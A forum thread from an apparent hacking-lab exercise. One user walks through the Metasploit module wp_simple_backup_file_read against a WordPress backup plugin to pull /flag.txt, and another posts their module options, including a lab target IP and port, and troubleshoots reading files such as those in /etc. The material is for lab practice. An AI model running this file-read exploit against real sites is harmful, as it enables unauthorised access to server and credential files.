Getting Started | Public Exploit | Quick solve

Hello, its x69h4ck3r, i am gonna make this straight forward as possible,

cos you ma have spent hours on this.

Ok!, lets jump into it.

Step 1: Search for the plugin exploit on the web.
example; search on google.com like this; “Backup Plugin 2.7.10 for WordPress exploit”
when done, you will get lots of result.
pick the one with rapid7, its short…

in rapid7 the metasploit exploit for this vulnerability
is shown; “wp_simple_backup_file_read”.
we then go in our terminal and fire up the metasploit framework
in other to use this exploit on our target server.

Step 2: Fire up the metasploit DataBase.

this command in your terminal to start up the postgresl db

systemctl start postgresql

this command to run the metasploit

msfconsole

search for the exploit using this command

search exploit wordpress plugin backup

locate “wp_simple_backup_file_read” and use the command bellow

use auxiliary/scanner/http/wp_simple_backup_file_read

when in the command, type “show options”

change the rhosts to the target_ip;

change rport to the target_port

change filepath to /flag.txt

press enter, cross-check your parameters by using the “show options” command

once satisfied, type the “run or exploit” command to get the exploit working,

and the flag will be downloaded into the .msf4/loot/ folder

you can use "locate /.msf4/loot/ " to locate and pivot into the directory

and then read the file with the “cat” command…

i hope this was useful… please like and comment, let me know if this solved your problem.

:smile:

1 Like

When I do this, nothing downloads into the loot folder. It just says:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Here are my options for reference:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     142.93.47.26     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      30633            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

What do you think? What am I doing wrong? Is there something wrong with the box?

I’ll just reply to myself. I ended up using pwnbox and it worked lol. Hours later. ugh

for the record, I also tried it with just “flag.txt” (no quotes) as the filepath… and a lot of other things, including a bunch of stuff you’d expect to see in /etc